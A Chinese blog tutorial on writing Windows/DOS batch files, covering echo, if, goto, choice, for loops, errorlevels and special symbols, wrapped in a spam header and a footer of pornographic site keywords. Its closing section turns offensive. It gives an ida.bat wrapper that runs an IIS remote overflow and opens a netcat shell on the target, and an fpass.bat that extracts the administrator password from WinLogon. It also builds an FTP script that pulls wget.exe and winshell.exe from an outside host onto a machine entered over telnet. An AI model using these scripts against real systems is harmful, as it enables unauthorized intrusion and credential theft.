亚洲免费在线-亚洲免费在线播放-亚洲免费在线观看-亚洲免费在线观看视频-亚洲免费在线看-亚洲免费在线视频

bat文件編寫

系統(tǒng) 1561 0
首先,批處理文件是一個文本文件,這個文件的每一行都是一條DOS命令(大部分時候就好象我們在DOS提示符下執(zhí)行的命令行一樣),你可以使用DOS下的Edit或者Windows的記事本(notepad)等任何文本文件編輯工具創(chuàng)建和修改批處理文件。

其次,批處理文件是一種簡單的程序,可以通過條件語句(if)和流程控制語句(goto)來控制命令運(yùn)行的流程,在批處理中也可以使用循環(huán)語句(for)來循環(huán)執(zhí)行一條命令。當(dāng)然,批處理文件的編程能力與C語言等編程語句比起來是十分有限的,也是十分不規(guī)范的。批處理的程序語句就是一條條的 DOS命令(包括內(nèi)部命令和外部命令),而批處理的能力主要取決于你所使用的命令。

第三,每個編寫好的批處理文件都相當(dāng)于一個DOS的外部命令,你可以把它所在的目錄放到你的DOS搜索路徑(path)中來使得它可以在任意位置運(yùn)行。一個良好的習(xí)慣是在硬盤上建立一個bat或者batch 目錄(例如C:\BATCH),然后將所有你編寫的批處理文件放到該目錄中,這樣只要在path中設(shè)置上c:\batch,你就可以在任意位置運(yùn)行所有你編寫的批處理程序。

第四,在DOS和Win9x/Me系統(tǒng)下,C:盤根目錄下的AUTOEXEC.BAT批處理文件是自動運(yùn)行批處理文件,每次系統(tǒng)啟動時會自動運(yùn)行該文件,你可以將系統(tǒng)每次啟動時都要運(yùn)行的命令放入該文件中,例如設(shè)置搜索路徑,調(diào)入鼠標(biāo)驅(qū)動和磁盤緩存,設(shè)置系統(tǒng)環(huán)境變量等。下面是一個運(yùn)行于 Windows 98下的autoexec.bat的示例:

@ECHO OFF

PATH C:\WINDOWS;C:\WINDOWS\COMMAND;C:\UCDOS;C:\DOSTools;C:\SYSTOOLS;C:\WINTOOLS;C:\BATCH

LH SMARTDRV.EXE /X

LH DOSKEY.COM /INSERT

LH CTMOUSE.EXE

SET TEMP=D:\TEMP

SET TMP=D:\TEMP

批處理的作用

簡單的說,批處理的作用就是自動的連續(xù)執(zhí)行多條命令。

這里先講一個最簡單的應(yīng)用:在啟動wps軟件時,每次都必須執(zhí)行(>前面內(nèi)容表示DOS提示符):

C:\>cd wps

C:\WPS>spdos

C:\WPS>py

C:\WPS>wbx

C:\WPS>wps

如果每次用WPS之前都這樣執(zhí)行一遍,您是不是覺得很麻煩呢?

好了,用批處理,就可以實(shí)現(xiàn)將這些麻煩的操作簡單化,首先我們編寫一個runwps.bat批處理文件,內(nèi)容如下:

@echo off

c:

cd\wps

spdos

py

wbx

wps

cd\

以后,我們每次進(jìn)入wps,只需要運(yùn)行runwps這個批處理文件即可。

常用命令

echo、@、call、pause、rem(小技巧:用::代替rem)是批處理文件最常用的幾個命令,我們就從他們開始學(xué)起。

echo 表示顯示此命令后的字符

echo off 表示在此語句后所有運(yùn)行的命令都不顯示命令行本身

@與echo off相象,但它是加在每個命令行的最前面,表示運(yùn)行時不顯示這一行的命令行(只能影響當(dāng)前行)。

call 調(diào)用另一個批處理文件(如果不用call而直接調(diào)用別的批處理文件,那么執(zhí)行完那個批處理文件后將無法返回當(dāng)前文件并執(zhí)行當(dāng)前文件的后續(xù)命令)。

pause 運(yùn)行此句會暫停批處理的執(zhí)行并在屏幕上顯示Press any key to continue...的提示,等待用戶按任意鍵后繼續(xù)

rem 表示此命令后的字符為解釋行(注釋),不執(zhí)行,只是給自己今后參考用的(相當(dāng)于程序中的注釋)。

例1:用edit編輯a.bat文件,輸入下列內(nèi)容后存盤為c:\a.bat,執(zhí)行該批處理文件后可實(shí)現(xiàn):將根目錄中所有文件寫入 a.txt中,啟動UCDOS,進(jìn)入WPS等功能。

  批處理文件的內(nèi)容為: 命令注釋:

@echo off           不顯示后續(xù)命令行及當(dāng)前命令行

dir c:\*.* >a.txt       將c盤文件列表寫入a.txt

call c:\ucdos\ucdos.bat    調(diào)用ucdos

echo 你好 顯示"你好"

pause 暫停,等待按鍵繼續(xù)

rem 準(zhǔn)備運(yùn)行wps 注釋:準(zhǔn)備運(yùn)行wps

cd ucdos 進(jìn)入ucdos目錄

wps 運(yùn)行wps

批處理文件的參數(shù)

批處理文件還可以像C語言的函數(shù)一樣使用參數(shù)(相當(dāng)于DOS命令的命令行參數(shù)),這需要用到一個參數(shù)表示符"%"。

%[1-9]表示參數(shù),參數(shù)是指在運(yùn)行批處理文件時在文件名后加的以空格(或者Tab)分隔的字符串。變量可以從%0到%9,%0表示批處理命令本身,其它參數(shù)字符串用%1到%9順序表示。

例2:C:根目錄下有一批處理文件名為f.bat,內(nèi)容為:

@echo off

format %1

如果執(zhí)行C:\>f a:

那么在執(zhí)行f.bat時,%1就表示a:,這樣format %1就相當(dāng)于format a:,于是上面的命令運(yùn)行時實(shí)際執(zhí)行的是format a:

例3:C:根目錄下一批處理文件名為t.bat,內(nèi)容為:

@echo off

type %1

type %2

那么運(yùn)行C:\>t a.txt b.txt

%1 : 表示a.txt

%2 : 表示b.txt

于是上面的命令將順序地顯示a.txt和b.txt文件的內(nèi)容。

特殊命令

if goto choice for是批處理文件中比較高級的命令,如果這幾個你用得很熟練,你就是批處理文件的專家啦。

一、if 是條件語句,用來判斷是否符合規(guī)定的條件,從而決定執(zhí)行不同的命令。 有三種格式:

1、if [not] "參數(shù)" == "字符串" 待執(zhí)行的命令

參數(shù)如果等于(not表示不等,下同)指定的字符串,則條件成立,運(yùn)行命令,否則運(yùn)行下一句。

例:if "%1"=="a" format a:

2、if [not] exist [路徑\]文件名 待執(zhí)行的命令

如果有指定的文件,則條件成立,運(yùn)行命令,否則運(yùn)行下一句。

如: if exist c:\config.sys type c:\config.sys

表示如果存在c:\config.sys文件,則顯示它的內(nèi)容。

3、if errorlevel <數(shù)字> 待執(zhí)行的命令

很多DOS程序在運(yùn)行結(jié)束后會返回一個數(shù)字值用來表示程序運(yùn)行的結(jié)果(或者狀態(tài)),通過if errorlevel命令可以判斷程序的返回值,根據(jù)不同的返回值來決定執(zhí)行不同的命令(返回值必須按照從大到小的順序排列)。如果返回值等于指定的數(shù)字,則條件成立,運(yùn)行命令,否則運(yùn)行下一句。

如if errorlevel 2 goto x2

二、goto 批處理文件運(yùn)行到這里將跳到goto所指定的標(biāo)號(標(biāo)號即label,標(biāo)號用:后跟標(biāo)準(zhǔn)字符串來定義)處,goto語句一般與if配合使用,根據(jù)不同的條件來執(zhí)行不同的命令組。

如:

goto end

:end

echo this is the end

標(biāo)號用":字符串"來定義,標(biāo)號所在行不被執(zhí)行。

三、choice 使用此命令可以讓用戶輸入一個字符(用于選擇),從而根據(jù)用戶的選擇返回不同的errorlevel,然后于if errorlevel配合,根據(jù)用戶的選擇運(yùn)行不同的命令。

注意:choice命令為DOS或者Windows系統(tǒng)提供的外部命令,不同版本的choice命令語法會稍有不同,請用choice /?查看用法。

choice的命令語法(該語法為Windows 2003中choice命令的語法,其它版本的choice的命令語法與此大同小異):

CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]

描述:

該工具允許用戶從選擇列表選擇一個項(xiàng)目并返回所選項(xiàng)目的索引。

參數(shù)列表:

/C choices 指定要創(chuàng)建的選項(xiàng)列表。默認(rèn)列表是 "YN"。

/N         在提示符中隱藏選項(xiàng)列表。提示前面的消息得到顯示,選項(xiàng)依舊處于啟用狀態(tài)。

/CS 允許選擇分大小寫的選項(xiàng)。在默認(rèn)情況下,這個工具是不分大小寫的。

/T timeout 做出默認(rèn)選擇之前,暫停的秒數(shù)。可接受的值是從 0 到 9999。如果指定了 0,就不會有暫停,默認(rèn)選項(xiàng)

           會得到選擇。

/D choice    在 nnnn 秒之后指定默認(rèn)選項(xiàng)。字符必須在用 /C 選項(xiàng)指定的一組選擇中; 同時,必須用 /T 指定 nnnn。

/M text     指定提示之前要顯示的消息。如果沒有指定,工具只顯示提示。

/?         顯示幫助消息。

 注意:

ERRORLEVEL 環(huán)境變量被設(shè)置為從選擇集選擇的鍵索引。列出的第一個選擇返回 1,第二個選擇返回 2,等等。如果用戶按的鍵不是有效的選擇,該工具會發(fā)出警告響聲。如果該工具檢測到錯誤狀態(tài),它會返回 255 的ERRORLEVEL 值。如果用戶按 Ctrl+Break 或 Ctrl+C 鍵,該工具會返回 0 的 ERRORLEVEL 值。在一個批程序中使用 ERRORLEVEL 參數(shù)時,將參數(shù)降序排列。

示例:

CHOICE /?

CHOICE /C YNC /M "確認(rèn)請按 Y,否請按 N,或者取消請按 C。"

CHOICE /T 10 /C ync /CS /D y

CHOICE /C ab /M "選項(xiàng) 1 請選擇 a,選項(xiàng) 2 請選擇 b。"

CHOICE /C ab /N /M "選項(xiàng) 1 請選擇 a,選項(xiàng) 2 請選擇 b。"

如果我運(yùn)行命令:CHOICE /C YNC /M "確認(rèn)請按 Y,否請按 N,或者取消請按 C。"

屏幕上會顯示:

確認(rèn)請按 Y,否請按 N,或者取消請按 C。 [Y,N,C]?

例:test.bat的內(nèi)容如下(注意,用if errorlevel判斷返回值時,要按返回值從高到低排列):

@echo off

choice /C dme /M "defrag,mem,end"

if errorlevel 3 goto end

if errorlevel 2 goto mem

if errotlevel 1 goto defrag

:defrag

c:\dos\defrag

goto end

:mem

mem

goto end

:end

echo good bye

此批處理運(yùn)行后,將顯示"defrag,mem,end[D,M,E]?" ,用戶可選擇d m e ,然后if語句根據(jù)用戶的選擇作出判斷,d表示執(zhí)行標(biāo)號為defrag的程序段,m表示執(zhí)行標(biāo)號為mem的程序段,e表示執(zhí)行標(biāo)號為end的程序段,每個程序段最后都以goto end將程序跳到end標(biāo)號處,然后程序?qū)@示good bye,批處理運(yùn)行結(jié)束。

四、for 循環(huán)命令,只要條件符合,它將多次執(zhí)行同一命令。

語法:

對一組文件中的每一個文件執(zhí)行某個特定命令。

FOR %%variable IN (set) DO command [command-parameters]

%%variable    指定一個單一字母可替換的參數(shù)。

(set)      指定一個或一組文件。可以使用通配符。

command     指定對每個文件執(zhí)行的命令。

command-parameters 為特定命令指定參數(shù)或命令行開關(guān)。

例如一個批處理文件中有一行:

for %%c in (*.bat *.txt) do type %%c

則該命令行會顯示當(dāng)前目錄下所有以bat和txt為擴(kuò)展名的文件的內(nèi)容。

批處理示例

1. IF-EXIST

1)

首先用記事本在C:\建立一個test1.bat批處理文件,文件內(nèi)容如下:

@echo off

IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT

IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist

然后運(yùn)行它:

C:\>TEST1.BAT

如果C:\存在AUTOEXEC.BAT文件,那么它的內(nèi)容就會被顯示出來,如果不存在,批處理就會提示你該文件不存在。

2)

接著再建立一個test2.bat文件,內(nèi)容如下:

@ECHO OFF

IF EXIST \%1 TYPE \%1

IF NOT EXIST \%1 ECHO \%1 does not exist

執(zhí)行:

C:\>TEST2 AUTOEXEC.BAT

該命令運(yùn)行結(jié)果同上。

說明:

(1) IF EXIST 是用來測試文件是否存在的,格式為

IF EXIST [路徑+文件名] 命令

(2) test2.bat文件中的%1是參數(shù),DOS允許傳遞9個批參數(shù)信息給批處理文件,分別為%1~%9(%0表示test2命令本身) ,這有點(diǎn)象編程中的實(shí)參和形參的關(guān)系,%1是形參,AUTOEXEC.BAT是實(shí)參。

3) 更進(jìn)一步的,建立一個名為TEST3.BAT的文件,內(nèi)容如下:

@echo off

IF "%1" == "A" ECHO XIAO

IF "%2" == "B" ECHO TIAN

IF "%3" == "C" ECHO XIN

如果運(yùn)行:

C:\>TEST3 A B C

屏幕上會顯示:

XIAO

TIAN

XIN

如果運(yùn)行:

C:\>TEST3 A B

屏幕上會顯示

XIAO

TIAN

在這個命令執(zhí)行過程中,DOS會將一個空字符串指定給參數(shù)%3。

2、IF-ERRORLEVEL

建立TEST4.BAT,內(nèi)容如下:

@ECHO OFF

XCOPY C:\AUTOEXEC.BAT D:IF ERRORLEVEL 1 ECHO 文件拷貝失敗

IF ERRORLEVEL 0 ECHO 成功拷貝文件

然后執(zhí)行文件:

C:\>TEST4

如果文件拷貝成功,屏幕就會顯示"成功拷貝文件",否則就會顯示"文件拷貝失敗"。

IF ERRORLEVEL 是用來測試它的上一個DOS命令的返回值的,注意只是上一個命令的返回值,而且返回值必須依照從大到小次序順序判斷。因此下面的批處理文件是錯誤的:

@ECHO OFF

XCOPY C:\AUTOEXEC.BAT D:\

IF ERRORLEVEL 0 ECHO 成功拷貝文件

IF ERRORLEVEL 1 ECHO 未找到拷貝文件

IF ERRORLEVEL 2 ECHO 用戶通過ctrl-c中止拷貝操作

IF ERRORLEVEL 3 ECHO 預(yù)置錯誤阻止文件拷貝操作

IF ERRORLEVEL 4 ECHO 拷貝過程中寫盤錯誤

無論拷貝是否成功,后面的:

未找到拷貝文件

用戶通過ctrl-c中止拷貝操作

預(yù)置錯誤阻止文件拷貝操作

拷貝過程中寫盤錯誤

都將顯示出來。

以下就是幾個常用命令的返回值及其代表的意義:

backup

0 備份成功

1 未找到備份文件

2 文件共享沖突阻止備份完成

3 用戶用ctrl-c中止備份

4 由于致命的錯誤使備份操作中止

diskcomp

0 盤比較相同

1 盤比較不同

2 用戶通過ctrl-c中止比較操作

3 由于致命的錯誤使比較操作中止

4 預(yù)置錯誤中止比較

diskcopy

0 盤拷貝操作成功

1 非致命盤讀/寫錯

2 用戶通過ctrl-c結(jié)束拷貝操作

3 因致命的處理錯誤使盤拷貝中止

4 預(yù)置錯誤阻止拷貝操作

format

0 格式化成功

3 用戶通過ctrl-c中止格式化處理

4 因致命的處理錯誤使格式化中止

5 在提示"proceed with format(y/n)?"下用戶鍵入n結(jié)束

xcopy

0 成功拷貝文件

1 未找到拷貝文件

2 用戶通過ctrl-c中止拷貝操作

4 預(yù)置錯誤阻止文件拷貝操作

5 拷貝過程中寫盤錯誤

3、IF STRING1 == STRING2

建立TEST5.BAT,文件內(nèi)容如下:

@echo off

IF "%1" == "A" formAT A:

執(zhí)行:

C:\>TEST5 A

屏幕上就出現(xiàn)是否將A:盤格式化的內(nèi)容。

注意:為了防止參數(shù)為空的情況,一般會將字符串用雙引號(或者其它符號,注意不能使用保留符號)括起來。

如:if [%1]==[A] 或者 if %1*==A*

5、GOTO

建立TEST6.BAT,文件內(nèi)容如下:

@ECHO OFF

IF EXIST C:\AUTOEXEC.BAT GOTO _COPY

GOTO _DONE

:_COPY

COPY C:\AUTOEXEC.BAT D:\

:_DONE

注意:

(1) 標(biāo)號前是ASCII字符的冒號":",冒號與標(biāo)號之間不能有空格。

(2) 標(biāo)號的命名規(guī)則與文件名的命名規(guī)則相同。

(3) DOS支持最長八位字符的標(biāo)號,當(dāng)無法區(qū)別兩個標(biāo)號時,將跳轉(zhuǎn)至最近的一個標(biāo)號。

6、FOR

建立C:\TEST7.BAT,文件內(nèi)容如下:

@ECHO OFF

FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C

運(yùn)行:

C:>TEST7

執(zhí)行以后,屏幕上會將C:盤根目錄下所有以BAT、TXT、SYS為擴(kuò)展名的文件內(nèi)容顯示出來(不包括隱藏文件)。

win2000命令行方式批處理BAT文件技巧

文章結(jié)構(gòu)

1. 所有內(nèi)置命令的幫助信息

2. 環(huán)境變量的概念

3. 內(nèi)置的特殊符號(實(shí)際使用中間注意避開)

4. 簡單批處理文件概念

5. 附件1 tmp.txt

6. 附件2 sample.bat

###########################

1. 所有內(nèi)置命令的幫助信息

###########################

ver

cmd /?

set /?

rem /?

if /?

echo /?

goto /?

for /?

shift /?

call /?

其他需要的常用命令

type /?

find /?

findstr /?

copy /?

下面將所有上面的幫助輸出到一個文件

echo ver >tmp.txt

ver >>tmp.txt

echo cmd /? >>tmp.txt

cmd /? >>tmp.txt

echo rem /? >>tmp.txt

rem /? >>tmp.txt

echo if /? >>tmp.txt

if /? >>tmp.txt

echo goto /? >>tmp.txt

goto /? >>tmp.txt

echo for /? >>tmp.txt

for /? >>tmp.txt

echo shift /? >>tmp.txt

shift /? >>tmp.txt

echo call /? >>tmp.txt

call /? >>tmp.txt

echo type /? >>tmp.txt

type /? >>tmp.txt

echo find /? >>tmp.txt

find /? >>tmp.txt

echo findstr /? >>tmp.txt

findstr /? >>tmp.txt

echo copy /? >>tmp.txt

copy /? >>tmp.txt

type tmp.txt

#############################

2. 環(huán)境變量的概念

#############################

C:\Program Files>set

ALLUSERSPROFILE=C:\Documents and Settings\All Users

CommonProgramFiles=C:\Program Files\Common Files

COMPUTERNAME=FIRST

ComSpec=C:\WINNT\system32\cmd.exe

NUMBER_OF_PROCESSORS=1

OS=Windows_NT

Os2LibPath=C:\WINNT\system32\os2\dll;

Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel

PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0605

ProgramFiles=C:\Program Files

PROMPT=$P$G

SystemDrive=C:

SystemRoot=C:\WINNT

TEMP=C:\WINNT\TEMP

TMP=C:\WINNT\TEMP

USERPROFILE=C:\Documents and Settings\Default User

windir=C:\WINNT

path: 表示可執(zhí)行程序的搜索路徑. 我的建議是你把你的程序copy 到

%windir%\system32\. 這個目錄里面. 一般就可以自動搜索到.

語法: copy mychenxu.exe %windir%\system32\.

使用點(diǎn)(.) 便于一目了然

對環(huán)境變量的引用使用(英文模式,半角)雙引號

%windir% 變量

%%windir%% 二次變量引用.

我們常用的還有

%temp% 臨時文件目錄

%windir% 系統(tǒng)目錄

%errorlevel% 退出代碼

輸出文件到臨時文件目錄里面.這樣便于當(dāng)前目錄整潔.

對有空格的參數(shù). 你應(yīng)該學(xué)會使用雙引號("") 來表示比如對porgram file文件夾操作

C:\>dir p*

C:\ 的目錄

2000-09-02 11:47 2,164 PDOS.DEF

1999-01-03 00:47 <DIR> Program Files

1 個文件 2,164 字節(jié)

1 個目錄 1,505,997,824 可用字節(jié)

C:\>cd pro*

C:\Program Files>

C:\>

C:\>cd "Program Files"

C:\Program Files>

############################################

3. 內(nèi)置的特殊符號(實(shí)際使用中間注意避開)

############################################

微軟里面內(nèi)置了下列字符不能夠在創(chuàng)建的文件名中間使用

con nul aux \ / | || && ^ > < *

You can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples:

(大意: 要么你使用^作為前導(dǎo)字符表示.或者就只有使用雙引號""了)

To create the variable value new&name, type:

set varname=new^&name

To create the variable value "new&name", type:

set varname="new&name"

The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments.

find "Pacific Rim" < trade.txt > nwtrade.txt

IF EXIST filename. (del filename.) ELSE echo filename. missing

> 創(chuàng)建一個文件

>> 追加到一個文件后面

@ 前綴字符.表示執(zhí)行時本行在cmd里面不顯示, 可以使用 echo off關(guān)閉顯示

^ 對特殊符號( > < &)的前導(dǎo)字符. 第一個只是顯示aaa 第二個輸出文件bbb

echo 123456 ^> aaa

echo 1231231 > bbb

() 包含命令

(echo aa & echo bb)

, 和空格一樣的缺省分隔符號.

; 注釋,表示后面為注釋

: 標(biāo)號作用

| 管道操作

& Usage:第一條命令 & 第二條命令 [& 第三條命令...]

用這種方法可以同時執(zhí)行多條命令,而不管命令是否執(zhí)行成功

dir c:\*.exe & dir d:\*.exe & dir e:\*.exe

&& Usage:第一條命令 && 第二條命令 [&& 第三條命令...]

當(dāng)碰到執(zhí)行出錯的命令后將不執(zhí)行后面的命令,如果一直沒有出錯則一直執(zhí)行完所有命令;

|| Usage:第一條命令 || 第二條命令 [|| 第三條命令...]

當(dāng)碰到執(zhí)行正確的命令后將不執(zhí)行后面的命令,如果沒有出現(xiàn)正確的命令則一直執(zhí)行完所有命令;

常用語法格式

IF [NOT] ERRORLEVEL number command para1 para2

IF [NOT] string1==string2 command para1 para2

IF [NOT] EXIST filename command para1 para2

IF EXIST filename command para1 para2

IF NOT EXIST filename command para1 para2

IF "%1"=="" goto END

IF "%1"=="net" goto NET

IF NOT "%2"=="net" goto OTHER

IF ERRORLEVEL 1 command para1 para2

IF NOT ERRORLEVEL 1 command para1 para2

FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k

按照字母順序 ijklmnopq依次取參數(shù).

eol=c - 指一個行注釋字符的結(jié)尾(就一個)

skip=n - 指在文件開始時忽略的行數(shù)。

delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認(rèn)分隔符集。

########################

4. 簡單批處理文件概念

########################

echo This is test > a.txt

type a.txt

echo This is test 11111 >> a.txt

type a.txt

echo This is test 22222 > a.txt

type a.txt

第二個echo是追加

第三個echo將清空a.txt 重新創(chuàng)建 a.txt

netstat -n | find "3389"

這個將要列出所有連接3389的用戶的ip.

________________test.bat______

@echo please care

echo plese care 1111

echo plese care 2222

echo plese care 3333

@echo please care

@echo plese care 1111

@echo plese care 2222

@echo plese care 3333

rem 不顯示注釋語句,本行顯示

@rem 不顯示注釋語句,本行不顯示

@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe)

@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe)

_____________________________

下面我們以具體的一個idahack程序就是ida遠(yuǎn)程溢出為例子.應(yīng)該是很簡單的.

___________________ida.bat_____

@rem ver 1.0

@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe"

@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe"

@if "%1" =="" goto USAGE

@if NOT "%2" =="" goto SP2

:start

@echo Now start ...

@ping %1

@echo chinese win2k:1 sp1:2 sp2:3

idahack.exe %1 80 1 99 >%temp%\_tmp

@echo "prog exit code [%errorlevel%] idahack.exe"

@type %temp%\_tmp

@find "good luck " %temp%\_tmp

@echo "prog exit code [%errorlevel%] find [goog luck]"

@if NOT errorlevel 1 nc.exe %1 99

@goto END

:SP2

@idahack.exe %1 80 %2 99 %temp%\_tmp

@type %temp%\_tmp

@find "good luck " %temp%\_tmp

@if NOT errorlevel 1 nc.exe %1 99

@goto END

:USAGE

@echo Example: ida.bat IP

@echo Example: ida.bat IP (2,3)

:END

_____________________ida.bat__END_______

下面我們再來第二個文件.就是得到administrator的口令.

大多數(shù)人說得不到.其實(shí)是自己的沒有輸入正確的信息.

___________________________fpass.bat____________________________________________

@rem ver 1.0

@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe"

@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe"

@echo start....

@echo ____________________________________

@if "%1"=="" goto USAGE

@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt

@echo "prog exit code [%errorlevel%] findpass.exe"

@type %temp%\_findpass.txt

@echo ________________________________Here__pass★★★★★★★★

@ipconfig /all >>%temp%\_findpass.txt

@goto END

:USAGE

@pulist.exe >%temp%\_pass.txt

@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt

@echo "Example: fpass.bat %1 %2 %3 %4 !!!"

@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon"

:END

@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator "

@echo " fpass.bat end [%errorlevel%] !"

_________________fpass.bat___END___________________________________________________________

還有一個就是已經(jīng)通過telnet登陸了一個遠(yuǎn)程主機(jī).怎樣上傳文件(win)

依次在窗口輸入下面的東西. 當(dāng)然了也可以全部拷貝.Ctrl+V過去. 然后就等待吧!!

echo open 210.64.x.4 3396>w

echo read>>w

echo read>>w

echo cd winnt>>w

echo binary>>w

echo pwd >>w

echo get wget.exe >>w

echo get winshell.exe >>w

echo get any.exe >>w

echo quit >>w

ftp -s:w

bat文件編寫


更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號聯(lián)系: 360901061

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長非常感激您!手機(jī)微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對您有幫助就好】

您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長會非常 感謝您的哦!!!

發(fā)表我的評論
最新評論 總共0條評論
主站蜘蛛池模板: 在线亚洲免费 | 一区二区三区在线免费观看视频 | 欧美jlzz18性欧美 | 免费爱爱片 | 蕾丝视频永久在线入口香蕉 | 四虎影视色费永久在线观看 | 成人久久在线 | 中文字幕视频在线免费观看 | 欧美国产精品久久 | 亚洲一区二区三区四区热压胶 | 久久九九有精品国产56 | 国产精品久久毛片 | 婷婷亚洲五月 | 日韩色视频一区二区三区亚洲 | 亚洲国产成人久久综合野外 | 亚洲九九 | 操片免费看 | 波多野结衣一区二区 三区 波多野结衣一区二区三区 波多野结衣一区二区三区高清在线 | 一级成人毛片免费观看欧美 | 四虎地址8848在线观看 | 成 人国产在线观看高清不卡 | 日色视频 | 日本一区二区三区四区在线观看 | 欧美亚洲国产色综合 | 日韩中文字幕一区 | 国产成人精品日本亚洲麻豆 | 97午夜精品 | 高清在线一区 | 亚洲精品久久久久久动漫剧情 | 91久久精品国产91性色tv | 美女黄频视频大全免费高清 | 国产免费三a在线 | 久久久精彩视频 | 美女粉逼 | 天天干天天草天天射 | 一级黄色a毛片 | 欧美另类丰满69xxxxx | 天天干夜夜操美女 | 夜色私人影院永久地址入口 | 亚洲精品日韩一区二区 | 精品伊人久久久 |